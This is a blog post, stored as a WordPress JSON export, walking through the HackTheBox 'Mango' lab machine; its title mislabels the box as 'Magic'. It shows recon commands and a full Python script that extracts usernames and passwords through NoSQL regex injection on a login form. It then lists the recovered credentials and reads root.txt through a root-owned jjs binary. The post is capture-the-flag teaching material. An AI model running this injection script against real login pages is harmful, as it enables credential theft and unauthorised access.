{"id":20,"date":"2020-04-27T11:47:45","date_gmt":"2020-04-27T11:47:45","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=20"},"modified":"2020-05-09T11:06:12","modified_gmt":"2020-05-09T11:06:12","slug":"hackthebox-magic-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","title":{"rendered":"HackTheBox : Magic Walkthrough"},"content":{"rendered":"\n<p>Hello everyone!!<\/p>\n\n\n\n<p>This is Shreya Pohekar. Today, we are doing Mango from HackTheBox. It's an easy Linux box that mainly focuses on <strong>NoSQL injection<\/strong> to get the initial foothold and on privilege escalation via <strong>jjs<\/strong>, a Java command-line tool that interprets JavaScript.<\/p>\n\n\n\n<p>So let's get started.<\/p>\n\n\n\n<p>A simple nmap scan revealed a few open ports, such as SSH, HTTP and HTTPS.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -o mangoscan.nmap 10.10.10.162<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Y-fUv8SqPoYElyAenhBWXIHTsyjJsMtDZeiGI1-_8_9bgGF3KL2YjD_3MVcyrWy3k-tVuuGMgKgKOHxJRqa0kuRJVp9XLg58Y1PYOyeNpS9WH09x6q9blnScGZOgksQZ2yWpdBEM\" alt=\"\"\/><\/figure>\n\n\n\n<p>The CN (common name) appeared in the nmap results.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/DKnaxS3I8r862NDRF4TvWYNBRYTzCbIGgDgXRKqsPKZuaLH6k8II9QDljJVcKN4t4k59KNwEx66ZuVOKd7pcZdB1D9vs_h0bARWMSJqBmkJBwHf4iaur3XfXaMOFqmw_eGAByhMu\" alt=\"\"\/><\/figure>\n\n\n\n<p>We have to add this entry to \/etc\/hosts:<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<pre class=\"wp-block-preformatted wpf-blue-background\"># vim \/etc\/hosts<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>10.10.10.162 staging-order.mango.htb<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>Access to <a 
href=\"http:\/\/10.10.10.162\">http:\/\/10.10.10.162<\/a> was forbidden, so I tried <a href=\"https:\/\/10.10.10.162\">https:\/\/10.10.10.162<\/a> and a page loaded that looked similar to the Google search engine page.<\/p>\n\n\n\n<p>I ran a gobuster scan with the -k switch to skip SSL certificate verification for HTTPS websites.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u https:\/\/10.10.10.162 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 50 -k<\/pre>\n\n\n\n<p>Meanwhile, I went to <a href=\"https:\/\/staging-order.mango.htb\">https:\/\/staging-order.mango.htb<\/a> and got a <strong>login page<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/rKCqt0K1Wj8FX9HfADNR1j_lsanteE16Zl8Bz9iSAhioTnDOn-HG4D-nNWg6kXNBUwouLOmCa47x4z0MUjLIDu1-QYRFMe-f1vQvPSP34jZn1-t82_Mx7EWpiT-kTu2Aom6ykOZG\" alt=\"\"\/><\/figure>\n\n\n\n<p>I tried different username-password combinations, but nothing worked. The page returned a 200 OK response for every request made. 
So I intercepted the request with Burp and, after a bit of digging, found that the form was vulnerable to NoSQL injection.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/O5HFwW17ZFQ97akAjmfEFajd8y2-Lig8GW_sZ4p6Lj9cOOxgTFW5-49XTNGbpBmIzqG49dgoM_UGINe4sra1Lk2AzbSlTRdfGnCickqTfILRjjWij8N4aeHh3y_IUptV0Qq22pLj\" alt=\"\"\/><\/figure>\n\n\n\n<p>(credits : <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection<\/a>)<\/p>\n\n\n\n<p>With the above payload, the response in Burp was 302 Found.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Ftq3h1jl7vpLl_8Et0WyOYkcObDQUm2LzViulkzOLdCGA0r94hjOo89BrlMU25l7PLQ47uwU33D-MVWmXaZZtGEeOu_v_6xRNliz9lsHe2rVUHvOT8PR2PlePPaPOnSDhl99xYSg\" alt=\"\"\/><\/figure>\n\n\n\n<p>I realized that by using the <strong>regex parameter<\/strong>, the usernames and passwords can be retrieved, testing one character per request. The login answers with a 302 redirect only when the injected pattern matches a stored value, so each response confirms or rejects a guessed prefix.<\/p>\n\n\n\n<p style=\"color:#1f1e1e\" class=\"has-text-color has-drop-cap\">I grabbed a script from <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">hacktricks<\/a> that performs the same steps.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\n\nurl = \"http:\/\/staging-order.mango.htb\"\nheaders = {\"Host\": \"staging-order.mango.htb\"}\ncookies = {\"PHPSESSID\": \"8m928e8vlmg8de7bl7vr9fpndk\"}\n# Candidate characters; punctuation and whitespace are backslash-escaped\n# so the regex treats them as literals.\npossible_chars = list(string.ascii_letters) + list(string.digits) + &#91;\"\\\\\"+c for c in string.punctuation+string.whitespace]\n\ndef get_password(username):\n    print(\"Extracting password of \"+username)\n    params = {\"username\":username, \"password&#91;$regex]\":\"\", \"login\": \"login\"}\n    password = \"^\"\n    while True:\n        for c in possible_chars:\n            # Anchored prefix guess: a 302 means the prefix matched.\n            params&#91;\"password&#91;$regex]\"] = password + c + \".*\"\n            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n            if int(pr.status_code) == 302:\n                password += c\n                break\n        else:\n            # No candidate extended the prefix: the password is complete.\n            print(\"Found password \"+password&#91;1:].replace(\"\\\\\", \"\")+\" for username \"+username)\n            return password&#91;1:].replace(\"\\\\\", \"\")\n\ndef get_usernames():\n    usernames = &#91;]\n    params = {\"username&#91;$regex]\":\"\", \"password&#91;$regex]\":\".*\", \"login\": \"login\"}\n    for c in possible_chars:\n        username = \"^\" + c\n        params&#91;\"username&#91;$regex]\"] = username + \".*\"\n        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n        if int(pr.status_code) == 302:\n            print(\"Found username starting with \"+c)\n            while True:\n                for c2 in possible_chars:\n                    params&#91;\"username&#91;$regex]\"] = username + c2 + \".*\"\n                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:\n                        username += c2\n                        print(username)\n                        break\n                else:\n                    # No candidate extended the prefix: the username is complete.\n                    print(\"Found username: \"+username&#91;1:])\n                    usernames.append(username&#91;1:])\n                    break\n    return usernames\n\n\nfor u in get_usernames():\n    get_password(u)\n<\/code><\/pre>\n\n\n\n<p>The script enumerated the users admin and mango, with the passwords <strong>t9KcS3>!0B#2 and h3mXK8RhU~f{]f5H<\/strong> respectively.<\/p>\n\n\n\n<p>I logged in over SSH with mango's credentials:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># ssh mango@10.10.10.162<\/pre>\n\n\n\n<p>Then I switched user to admin and got an sh shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 
decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oy9GbWvRPxUS8XpEvjg2LJamS6XDv3nHGtzlvZZPfDml3zTl8YwddMaW-FqSsq_PVc0uRB2ntS8mbEE-BZ3ezPbUmDVqFHco8XaUPkUOs_3m-mMy0vLCQPUy-DhbdycleMn3c5So\" alt=\"\"\/><\/figure>\n\n\n\n<p>Got user.txt.<\/p>\n\n\n\n<p>The ls -la command listed a file, .jjs.history, that looked interesting, so I found out its location.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/sxIsj_A_2UidhQXbBXsknQ5kA4g5MGJA3if-WhKi3L5DZc4ibieWlVS4NNwx39d4RiU-Rt5GJjVH8ooPAnXPODykMql7O_OHeHnGremj3QgCf56I6GSa7PuMSUXN3sSDi-L7G4Le\" alt=\"\"\/><\/figure>\n\n\n\n<p>Interestingly, the binary was running as root, which can lead to privilege escalation.<\/p>\n\n\n\n<p>After a bit of googling, I found that privilege escalation was possible with jjs.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ryDWOyINU8H6B9fAvb8_QZxn14nNc7iPqUvkhG9jWZ3t1sMTbrK7gJVhmD4FhU6UnGHhdHL4vpMH7b1EKBumos7pLlp8BT4NFY_04mcEffr99p20hhhH_arpS7UtyXn_kSfLpdUW\" alt=\"\"\/><\/figure>\n\n\n\n<p>I used the <strong>file read<\/strong> functionality, which can read any file with privileged rights. In the code, I inserted the path to root.txt directly and, upon successful execution, got the root flag.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/sGub4IJ114EVjXo2pWg8nBP_b1D5ucwy0C6R75o4ULPz3JzjpO5IEUHWoRBrmcM8_sztDjGFdFppkeKFc_lwsUlfWTRkl73DWB-fU8qKIV3rqXohaKMIulHL8mLE7PH-zVHz0qcE\" alt=\"\"\/><\/figure>\n\n\n\n<p>That\u2019s all for this blog post. I hope you enjoyed reading and learned something from it.<\/p>\n\n\n\n<p>For more such content, subscribe to my page! <br>\nUntil then, Happy Hunting!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An easy machine from HacktheBox. 
Let&#8217;s grab the root flag&#8230;..<\/p>\n","protected":false},"author":1,"featured_media":21,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[19,2],"tags":[26,29,31,27,28,30],"class_list":["post-20","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-hackthebox","tag-jjs-exploit","tag-jjs-gtfobins","tag-mango-hackthebox","tag-mango-walkthrough","tag-nosql-injection","entry","has-media"]}